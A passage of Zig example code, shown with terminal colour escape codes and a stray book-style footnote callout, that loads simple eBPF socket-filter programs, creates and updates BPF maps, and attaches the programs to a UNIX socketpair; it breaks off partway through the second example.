�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mPERM�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[33merror�[0m�[1m�[37m.�[0m�[1m�[37mAccessDenied�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37merr�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37munexpectedErrno�[0m�[1m�[37m(�[0m�[1m�[37merr�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[37mmap_update_elem�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37mtoBytes�[0m�[1m�[37m(�[0m�[37m@as�[0m�[1m�[37m(�[0m�[1m�[36mi32�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m)),�[0m�[1m�[37m �[0m�[1m�[37mstr�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mANY�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mattr�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mAttr�[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mmap_elem�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37mzeroes�[0m�[1m�[37m(�[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mMapElemAttr�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mattr�[0m�[1m�[37m.�[0m�[1m�[37mmap_elem�[0m�[1m�[37m.�[0m�[1m�[37mmap_fd�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mfd�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[33mswitch�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37merrno�[0m�[1m�[37m(�[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[37mbpf�[0m�[1m�[37m(.�[0m�[1m�[37mmap_freeze�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mattr�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@sizeOf�[0m�[1m�[37m(�[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mMapElemAttr�[0m�[1m�[37m))))�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mSUCCESS�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[37m{},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37merr�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37munexpectedErrno�[0m�[1m�[37m(�[0m�[1m�[37merr�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[37mfd�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mexample1�[0m�[1m�[37m()�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mdebug�[0m�[1m�[37m.�[0m�[37mprint�[0m�[1m�[37m(�[0m�[33m"---(BPF Example 1)---�[0m�[33m\n�[0m�[33m"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{});�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37minsns�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[37m]�[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mInsn�[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m4�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mexit�[0m�[1m�[37m(),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mverifier_log�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m0x10000�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mlog�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mLog�[0m�[1m�[37m{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mbuf�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mverifier_log�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mlevel�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m2�[0m�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mdefer�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37minfo�[0m�[1m�[37m(�[0m�[33m"BPF Verifier output:�[0m�[33m\n�[0m�[33m{s}"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37msliceTo�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mverifier_log�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m)});�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mprogfd�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[37mprog_load�[0m�[1m�[37m(�[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mProgType�[0m�[1m�[37m.�[0m�[1m�[37msocket_filter�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37minsns�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mlog�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"GPL v3"�[0m�[1m�[36m<<�[0m�[37mfootnote�[0m�[1m�[37m(�[0m�[33m"8"�[0m�[1m�[37m)�[0m�[1m�[36m>>�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37msocks�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m2�[0m�[1m�[37m]�[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mswitch�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37merrno�[0m�[1m�[37m(�[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[37msocketpair�[0m�[1m�[37m(�[0m�[1m�[37mAF�[0m�[1m�[37m.�[0m�[1m�[37mUNIX�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mSOCK�[0m�[1m�[37m.�[0m�[1m�[37mDGRAM�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37msocks�[0m�[1m�[37m)))�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mSUCCESS�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[37m{},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37me�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37munexpectedErrno�[0m�[1m�[37m(�[0m�[1m�[37me�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mswitch�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37merrno�[0m�[1m�[37m(�[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[37msetsockopt�[0m�[1m�[37m(�[0m�[1m�[37msocks�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m],�[0m�[1m�[37m �[0m�[1m�[37mSOL�[0m�[1m�[37m.�[0m�[1m�[37mSOCKET�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mSO�[0m�[1m�[37m.�[0m�[1m�[37mATTACH_BPF�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37masBytes�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mprogfd�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[1m�[36m4�[0m�[1m�[37m)))�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mSUCCESS�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[37m{},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37me�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37munexpectedErrno�[0m�[1m�[37m(�[0m�[1m�[37me�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37minput�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33m"Hello"�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mwrite�[0m�[1m�[37m(�[0m�[1m�[37msocks�[0m�[1m�[37m[�[0m�[1m�[36m1�[0m�[1m�[37m],�[0m�[1m�[37m �[0m�[1m�[37minput�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m10�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mn_read�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mread�[0m�[1m�[37m(�[0m�[1m�[37msocks�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m],�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mbuf�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37minfo�[0m�[1m�[37m(�[0m�[33m"Sent '{s}', received '{s}'"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m �[0m�[1m�[37minput�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[37mn_read�[0m�[1m�[37m]�[0m�[1m�[37m �[0m�[1m�[37m});�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mexample2�[0m�[1m�[37m()�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mdebug�[0m�[1m�[37m.�[0m�[37mprint�[0m�[1m�[37m(�[0m�[33m"---(BPF Example 2)---�[0m�[33m\n�[0m�[33m"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{});�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mmapfd�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mi32�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[37mmap_create�[0m�[1m�[37m(.�[0m�[1m�[37marray�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@sizeOf�[0m�[1m�[37m(�[0m�[1m�[36mi32�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[37m@sizeOf�[0m�[1m�[37m(�[0m�[1m�[36mu64�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[1m�[36m32�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[37mmap_update_elem�[0m�[1m�[37m(�[0m�[1m�[37mmapfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37m.{�[0m�[1m�[36m1�[0m�[1m�[37m},�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37m.{�[0m�[1m�[37m �[0m�[1m�[36m0xca�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0xfe�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0xba�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0xbe�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0xca�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0xfe�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0xba�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0xbe�[0m�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mANY�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37minsns�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[37m]�[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mInsn�[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mst�[0m�[1m�[37m(.�[0m�[1m�[37mdouble_word�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr10�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m1�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mst�[0m�[1m�[37m(.�[0m�[1m�[37mdouble_word�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr10�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x10�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0x1337�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mld_map_fd1�[0m�[1m�[37m(.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mmapfd�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mld_map_fd2�[0m�[1m�[37m(�[0m�[1m�[37mmapfd�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr2�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr10�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37madd�[0m�[1m�[37m(.�[0m�[1m�[37mr2�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x8�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr3�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr2�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37madd�[0m�[1m�[37m(.�[0m�[1m�[37mr3�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x8�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr4�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mcall�[0m�[1m�[37m(.�[0m�[1m�[37mmap_update_elem�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mexit�[0m�[1m�[37m(),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mverifier_log�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m0x10000�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mlog�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mLog�[0m�[1m�[37m{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mbuf�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mverifier_log�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mlevel�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m2�[0m�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mdefer�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37minfo�[0m�[1m�[37m(�[0m�[33m"BPF Verifier output:�[0m�[33m\n�[0m�[33m{s}"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37msliceTo�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mverifier_log�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m)});�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mprogfd�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[37mprog_load�[0m�[1m�[37m(�[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mProgType�[0m�[1m�[37m.�[0m�[1m�[37msocket_filter�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37minsns�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mlog�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"GPL v3"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37msocks�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m2�[0m�[1m�[37m]�[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mswitch�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37merrno�[0m�[1m�[37m(�[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[37msocketpair�[0m�[1m�[37m(�[0m�[1m�[37mAF�[0m�[1m�[37m.�[0m�[1m�[37mUNIX�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mSOCK�[0m�[1m�[37m.�[0m�[1m�[37mDGRAM�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37msocks�[0m�[1m�[37m)))�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mSUCCESS�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[37m{},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37me�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37munexpectedErrno�[0m�[1m�[37m(�[0m�[1m�[37me�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mswitch�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37merrno�[0m�[1m�[37m(�[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[37msetsockopt�[0m�[1m�[37m(�[0m�[1m�[37msocks�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m],�[0m�[1m�[37m �[0m�[1m�[37mSOL�[0m�[1m�[37m.�[0m�[1m�[37mSOCKET�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mSO�[0m�[1m�[37m.�[0m�[1m�[37mATTACH_BPF�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37masBytes�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mprogfd�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[1m�[36m4�[0m�[1m�[37m)))�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mSUCCESS�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[37m{},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37me�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37munexpectedErrno�[0m�[1m�[37m(�[0m�[1m�[37me�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m1�[0m�[1m�[37m]�[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
